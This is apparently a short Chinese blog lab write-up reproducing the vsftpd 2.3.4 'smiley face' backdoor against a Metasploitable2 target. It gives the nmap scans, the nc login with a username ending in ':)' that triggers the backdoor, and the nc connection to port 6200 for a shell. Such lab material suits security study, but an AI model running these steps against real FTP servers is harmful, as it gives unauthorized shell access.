VSFTP2.3.4(笑脸漏洞)

一、准备工作

1、攻击机和靶机都处于NAT模式

VSFTP2.3.4(笑脸漏洞)

2、攻击机:kali(192.168.252.131)

VSFTP2.3.4(笑脸漏洞)

3、靶机:metasploitable2()

VSFTP2.3.4(笑脸漏洞)

 

二、漏洞复现1、用nmap进行信息收集,输入nmap -sV 192.168.252.130,可以知道靶机开放了21端口,21端口提供ftp服务,ftp的版本信息是vsftpd 2.3.4

VSFTP2.3.4(笑脸漏洞)

 2、输入 nmap -p 6200 192.168.252.130,发现靶机的6200端口是关闭的

VSFTP2.3.4(笑脸漏洞)

3、另外在打开一个终端,用nc来连接靶机的21端口。输入:nc 192.168.252.130 21,然后输入user为 a:),pass随便输。

 VSFTP2.3.4(笑脸漏洞)

 4、再次查看靶机的6200端口,发现打开了

VSFTP2.3.4(笑脸漏洞)

 5、用nc连接靶机的6200端口,输入nc 192.168.252.130 6200,输入whoami

VSFTP2.3.4(笑脸漏洞)

 

 

上一篇:C#学习day03_1-委托,委托多播


下一篇:pentest魔法书